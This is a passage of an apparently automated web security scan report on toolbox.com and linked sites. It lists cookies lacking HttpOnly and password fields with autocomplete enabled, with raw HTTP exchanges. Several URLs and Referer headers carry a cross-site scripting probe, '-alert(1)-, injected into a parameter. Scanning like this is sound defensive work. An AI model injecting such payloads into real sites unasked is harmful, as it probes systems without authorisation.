Set-Cookie: joinedfrom=title=Future States&url=http://it.toolbox.com/blogs/ppmtoday?306f2'-alert(1)-'2382eb5920b=1&origin=5; domain=.toolbox.com; expires=Wed, 09-Feb-2011 14:47:17 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Register wi
...[SNIP]...

6.29. http://it.toolbox.com/jobs/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /jobs/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jobs/ HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40888
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:47:48 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Jobs
</tit
...[SNIP]...

6.30. http://it.toolbox.com/trd/885101  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /trd/885101

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /trd/885101 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 223
Content-Type: text/html; charset=utf-8
Location: http://windows.ittoolbox.com/research/windows-7-deployment-an-insiders-guide-23009?r=OnlinePostingReminder
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR IND UNI"
Set-Cookie: EREF=dest=http%3a%2f%2fwindows.ittoolbox.com%2fresearch%2fwindows-7-deployment-an-insiders-guide-23009%3fr%3dOnlinePostingReminder&source=&rid=885101; domain=.toolbox.com; expires=Mon, 26-Jan-2015 14:46:39 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:38 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://windows.ittoolbox.com/research/windows-7-deployment-an-insiders-guide-23009?r=OnlinePostingReminder">here</a>.
...[SNIP]...

6.31. http://links.industrybrains.com/click  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://links.industrybrains.com
Path:   /click

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click?sid=940&rqctid=6475&pos=1&lid=696567&cid=153413&pr=2&tstamp=20110126094929&iip=173.193.214.243&ltype=JSCR&lname=560x350v1&url=http://www.netapp.com/us/solutions/infrastructure/virtualization/guarantee.html HTTP/1.1
Host: links.industrybrains.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object Moved
Connection: close
Date: Wed, 26 Jan 2011 14:55:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="CAO DSP COR CURa "
Location: http://www.netapp.com/us/solutions/infrastructure/virtualization/guarantee.html
Content-Type: text/html
Set-Cookie: IBC1132967913=940@2@696567@153413@20110126095544@173.193.214.243;path=/sc/;expires=Monday, 25 July 2011 09:55:44 GMT;domain=IndustryBrains.com;


6.32. http://metrics.toolbox.com/b/ss/ittoolglobalit,ittoolitcio,ittoolglobal/1/H.17/s44680976476520  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.toolbox.com
Path:   /b/ss/ittoolglobalit,ittoolitcio,ittoolglobal/1/H.17/s44680976476520

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/ittoolglobalit,ittoolitcio,ittoolglobal/1/H.17/s44680976476520?AQB=1&ndh=1&t=26/0/2011%208%3A49%3A50%203%20360&vmt=4A284D57&ns=ittoolbox&pageName=IT%3AIT%20Management%3Ablogs%3Appmtoday%3AFuture%20States&g=http%3A//it.toolbox.com/blogs/ppmtoday%3F306f2%27-alert%281%29-%272382eb5920b%3D1&cc=USD&ch=blogs&events=event2&h1=IT%2CIT%20Management%2Cblogs%2Cppmtoday&h2=blogs%2CIT%2CIT%20Management&c3=Unrecognized&v3=Unrecognized&c5=IT&v5=IT&c6=IT%20Management&v6=IT%20Management&c7=blogs&v7=blogs&v10=IT%3AIT%20Management%3Ablogs%3Appmtoday%3AFuture%20States&c11=7%3A30AM&v11=7%3A30AM&c12=Wednesday&v12=Wednesday&c13=Weekday&v13=Weekday&v20=blogs&v26=blogs&c27=blogs%3Appmtoday&v27=blogs%3Appmtoday&c28=blogs%3Appmtoday&v28=blogs%3Appmtoday&c29=blogs%3Appmtoday&v29=blogs%3Appmtoday&c37=blogs%3AUnrecognized&c40=32&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.toolbox.com
Proxy-Connection: keep-alive
Referer: http://it.toolbox.com/blogs/ppmtoday?306f2'-alert(1)-'2382eb5920b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true

Response

HTTP/1.1 302 Found
Date: Wed, 26 Jan 2011 14:49:31 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; Expires=Mon, 25 Jan 2016 14:49:31 GMT; Domain=.toolbox.com; Path=/
Location: http://metrics.toolbox.com/b/ss/ittoolglobalit,ittoolitcio,ittoolglobal/1/H.17/s44680976476520?AQB=1&pccr=true&vidn=26A01A3D851D2B4A-60000137A054F13C&&ndh=1&t=26/0/2011%208%3A49%3A50%203%20360&vmt=4A284D57&ns=ittoolbox&pageName=IT%3AIT%20Management%3Ablogs%3Appmtoday%3AFuture%20States&g=http%3A//it.toolbox.com/blogs/ppmtoday%3F306f2%27-alert%281%29-%272382eb5920b%3D1&cc=USD&ch=blogs&events=event2&h1=IT%2CIT%20Management%2Cblogs%2Cppmtoday&h2=blogs%2CIT%2CIT%20Management&c3=Unrecognized&v3=Unrecognized&c5=IT&v5=IT&c6=IT%20Management&v6=IT%20Management&c7=blogs&v7=blogs&v10=IT%3AIT%20Management%3Ablogs%3Appmtoday%3AFuture%20States&c11=7%3A30AM&v11=7%3A30AM&c12=Wednesday&v12=Wednesday&c13=Weekday&v13=Weekday&v20=blogs&v26=blogs&c27=blogs%3Appmtoday&v27=blogs%3Appmtoday&c28=blogs%3Appmtoday&v28=blogs%3Appmtoday&c29=blogs%3Appmtoday&v29=blogs%3Appmtoday&c37=blogs%3AUnrecognized&c40=32&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.3.1
Expires: Tue, 25 Jan 2011 14:49:31 GMT
Last-Modified: Thu, 27 Jan 2011 14:49:31 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www389
Content-Length: 0
Content-Type: text/plain


6.33. http://oasc05134.247realmedia.com/RealMedia/ads/adstream_jx.ads/TLBXittoolbox/technology/1%7BTIME_DATE_STAMP%7D@Top1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05134.247realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/TLBXittoolbox/technology/1%7BTIME_DATE_STAMP%7D@Top1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/TLBXittoolbox/technology/1%7BTIME_DATE_STAMP%7D@Top1 HTTP/1.1
Host: oasc05134.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://it.toolbox.com/blogs/ppmtoday?306f2'-alert(1)-'2382eb5920b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl

Response

HTTP/1.1 200 OK
Date: Wed, 26 Jan 2011 14:49:29 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 451
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

document.write ('<A HREF="http://oasc05134.247realmedia.com/RealMedia/ads/click_lx.ads/TLBXittoolbox/technology/1{TIME_DATE_STAMP}/L24/664329713/Top1/BBN/Default_Toolbox_Universal_Multi/whitepaper_ldr
...[SNIP]...

6.34. http://www.facebook.com/pages/Toolboxcom/117012708708  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Toolboxcom/117012708708

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Toolboxcom/117012708708 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: datr=ODZATe8iFsKm4n_Xjpn2xOrf; expires=Fri, 25-Jan-2013 14:56:56 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=4TIUB; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Wed, 26 Jan 2011 14:56:57 GMT
Content-Length: 154510

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

6.35. http://www.netapp.com/us/solutions/infrastructure/virtualization/guarantee.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netapp.com
Path:   /us/solutions/infrastructure/virtualization/guarantee.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/solutions/infrastructure/virtualization/guarantee.html HTTP/1.1
Host: www.netapp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 26 Jan 2011 14:55:02 GMT
X-Server-Name: dv-c1-r1-u14-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 26 Jan 2011 14:57:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cae_browser=desktop; path=/; domain=.netapp.com
Content-Length: 104728


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...

6.36. http://www.omniture.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Omniture AWS/2.0.0
Location: http://www.omniture.com/en/
Content-Length: 313
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Wed, 26 Jan 2011 14:57:08 GMT
Connection: close
Set-Cookie: BIGipServerhttp_omniture=101320202.5892.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.omniture.com
...[SNIP]...

6.37. http://www.pbs.org/cringely/pulpit/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pbs.org
Path:   /cringely/pulpit/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cringely/pulpit/ HTTP/1.1
Host: www.pbs.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 26 Jan 2011 14:57:09 GMT
Server: Apache/2.2.17 (Unix)
Set-Cookie: www.apache.sid=a407b02ae7db3726c0e6bb20994d70e7; path=/; domain=.pbs.org
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 33427

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.o
...[SNIP]...

6.38. http://www.spiceworks.com/features/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.spiceworks.com
Path:   /features/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /features/ HTTP/1.1
Host: www.spiceworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 26 Jan 2011 14:57:12 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: swcls=173.193.214.243.1296053832148878; path=/; domain=.spiceworks.com
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20485

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

   <!-- Google Website
...[SNIP]...

7. Password field with autocomplete enabled  previous  next
There are 96 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


7.1. http://businessintelligence.ittoolbox.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://businessintelligence.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: businessintelligence.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 79300
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=lgzfjg45p5p4ttjbryycmjiv; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Business In
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.2. http://c.ittoolbox.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://c.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: c.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 73410
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=q4lyzl45xau0xnefonms5145; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   C Languages
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.3. http://cio.ittoolbox.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cio.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: cio.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 70865
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ev3vw13ts4uun2552nfwiz45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:19 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   CIO Communi
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.4. http://cio.ittoolbox.com/blogs/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cio.ittoolbox.com
Path:   /blogs/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /blogs/ HTTP/1.1
Host: cio.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 85344
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=sthdbdnv4isdq155nf5krjic; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   IT Manageme
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$m$txtSignin_Password" type="password" id="ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.5. http://cio.ittoolbox.com/directory/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cio.ittoolbox.com
Path:   /directory/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /directory/ HTTP/1.1
Host: cio.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 52564
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=el0hjp55tk5oie55qdseux55; path=/; HttpOnly
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.ittoolbox.com; expires=Tue, 26-Apr-2011 13:49:31 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   IT Manageme
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/directory/" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.6. http://cio.ittoolbox.com/documents/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cio.ittoolbox.com
Path:   /documents/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /documents/ HTTP/1.1
Host: cio.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 28204
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=kqpydg55prajw345gnpd1jaz; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   IT Manageme
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/documents/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.7. http://cio.ittoolbox.com/events/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cio.ittoolbox.com
Path:   /events/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /events/ HTTP/1.1
Host: cio.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38997
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=uu0vpmjgqupns155oiaxug55; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   IT Manageme
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/events/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.8. http://cio.ittoolbox.com/groups/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cio.ittoolbox.com
Path:   /groups/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /groups/ HTTP/1.1
Host: cio.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 131235
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ttokbo25mimfaly03xopef55; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   IT Manageme
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/groups/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$m$txtSignin_Password" type="password" id="ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.9. http://cio.ittoolbox.com/research/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cio.ittoolbox.com
Path:   /research/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /research/ HTTP/1.1
Host: cio.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 96466
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=mqlx3145uwj1pknllf1r5455; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   IT Manageme
...[SNIP]...
